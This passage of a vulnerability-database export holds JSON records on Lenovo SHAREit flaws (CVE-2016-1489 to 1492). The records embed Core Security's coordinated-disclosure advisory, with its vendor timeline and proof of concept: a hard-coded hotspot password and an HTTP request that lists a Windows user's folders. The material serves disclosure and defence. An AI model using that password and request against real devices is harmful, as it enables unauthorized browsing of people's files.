"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1490",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "135378",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-636",
"trust": 0.7
},
{
"db": "BID",
"id": "81748",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-90309",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90309"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
},
{
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"id": "VAR-201601-0461",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-90309"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:21:09.896000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LEN-4058",
"trust": 0.8,
"url": "https://support.lenovo.com/jp/ja/product_security/len_4058"
},
{
"title": "Lenovo SHAREit Wifi hotspot Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59951"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90309"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2016/jan/67"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/135378/lenovo-shareit-information-disclosure-hardcoded-password.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1490"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1490"
},
{
"trust": 0.3,
"url": "http://www.lenovo.com/ca/en/"
},
{
"trust": 0.1,
"url": "http://shareit.lenovo.com/#download."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1492"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1490"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1491"
},
{
"trust": 0.1,
"url": "http://www.lenovo.com."
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90309"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
},
{
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-90309"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
},
{
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-90309"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"date": "2016-01-25T20:02:22",
"db": "PACKETSTORM",
"id": "135378"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-636"
},
{
"date": "2016-01-26T19:59:05.343000",
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90309"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-636"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Windows Edition Lenovo SHAREit of WiFi Vulnerability in obtaining important file names in hotspots",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
}
],
"trust": 0.6
}
}
VAR-201601-0460
Vulnerability from variot - Updated: 2025-04-13 23:21Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-254: Security Features ( Security function ) Has been identified. http://cwe.mitre.org/data/definitions/254.htmlBy a third party (1) By intercepting the network, important information can be obtained, or (2) Middle man (man-in-the-middle/MITM) An attack may be executed. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) is a set of file sharing software from China Lenovo (Lenovo). 1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release
- Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492
- Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.
- Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues.
The new version of the products can be found here [1].
- Credits
This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.
- Technical Description / Proof of Concept Code
7.1. Hard-coded password in Lenovo SHAREit for Windows
[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same.
7.2. Remote browsing of file system on Lenovo SHAREit for Windows
[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426
{"containers":[{"filepath":"C:\Users\admin\Contacts","has_thumbnail":false,"id":"C:\Users\admin\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\Users\admin\Desktop","has_thumbnail":false,"id":"C:\Users\admin\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\Users\admin\Documents","has_thumbnail":false,"id":"C:\Users\admin\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\Users\admin\Downloads","has_thumbnail":false,"id":"C:\Users\admin\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\Users\admin\Favorites","has_thumbnail":false,"id":"C:\Users\admin\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\Users\admin\Links", "has_thumbnail":false,"id":"C:\Users\admin\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\Users\admin\Music","has_thumbnail":false,"id":"C:\Users\admin\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\Users\admin\Pictures","has_thumbnail":false,"id":"C:\Users\admin\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\Users\admin\Saved Games","has_thumbnail":false,"id":"C:\Users\admin\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\Users\admin\Searches","has_thumbnail":false,"id":"C:\Users\admin\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\Users\admin\Tracing","has_thumbnail":false,"id":"C:\Users\admin\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\Users\admin\Videos","has_thumbnail":false,"id":"C:\Users\admin\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\Users\admin","has_thumbnail":false,"id":"C:\Users\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit
[CVE-2016-1489] The files are transfered via HTTP without encryption.
7.4. Open WiFi Network defined on Android devices
[CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices.
- Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References
[1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com.
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0460",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "shareit",
"scope": "lte",
"trust": 1.0,
"vendor": "lenovo",
"version": "3.0.18_ww"
},
{
"model": "shareit",
"scope": "lte",
"trust": 1.0,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.2.0 (windows)"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.5.48_ww (android)"
},
{
"model": "shareit",
"scope": "eq",
"trust": 0.6,
"vendor": "lenovo",
"version": "3.0.18_ww"
},
{
"model": "shareit",
"scope": "eq",
"trust": 0.6,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for android 3.0.18 ww",
"scope": null,
"trust": 0.3,
"vendor": "lenovo",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lenovo:shareit",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ivan Huertas from Core Security Consulting Team.",
"sources": [
{
"db": "BID",
"id": "81748"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1489",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "CVE-2016-1489",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "VHN-90308",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:M/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2016-1489",
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1489",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-1489",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-635",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-90308",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-1489",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-254: Security Features ( Security function ) Has been identified. http://cwe.mitre.org/data/definitions/254.htmlBy a third party (1) By intercepting the network, important information can be obtained, or (2) Middle man (man-in-the-middle/MITM) An attack may be executed. Lenovo ShareIT is prone to multiple security vulnerabilities. \nAn attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) is a set of file sharing software from China Lenovo (Lenovo). 1. Advisory Information\n\nTitle: Lenovo ShareIT Multiple Vulnerabilities\nAdvisory ID: CORE-2016-0002\nAdvisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities\nDate published: 2016-01-25\nDate of last update: 2016-01-22\nVendors contacted: Lenovo\nRelease mode: Coordinated release\n\n2. Vulnerability Information\n\nClass: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]\nImpact: Security bypass, Information leak\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492\n\n \n\n3. Vulnerability Description\n\nSHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. \n\n4. Vulnerable Packages\n\nLenovo SHAREit for Android 3.0.18_ww\nLenovo SHAREit for Windows 2.5.1.1\nOther products and versions may also be affected, but they were not tested. \n\n5. Vendor Information, Solutions and Workarounds\n\nLenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. \n\nThe new version of the products can be found here [1]. \n\n6. Credits\n\nThis vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaqu\u00edn Rodr\u00edguez Varela from Core Security Advisories Team. \n\n \n\n7. Technical Description / Proof of Concept Code\n\n7.1. Hard-coded password in Lenovo SHAREit for Windows\n\n[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. \n\n7.2. Remote browsing of file system on Lenovo SHAREit for Windows\n\n[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:\n\n \nPOST /list?type=file\u0026path=C%3A%5CUsers\\admin HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)\nHost: 192.168.173.1:2999\nConnection: Keep-Alivek\nAccept-Encoding: gzip\nContent-Length: 0\nHTTP/1.0 200 OK\nContent-Length: 2426\n\n\n{\"containers\":[{\"filepath\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Contacts\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Desktop\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Documents\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Documents\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Documents\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Downloads\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Favorites\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Links\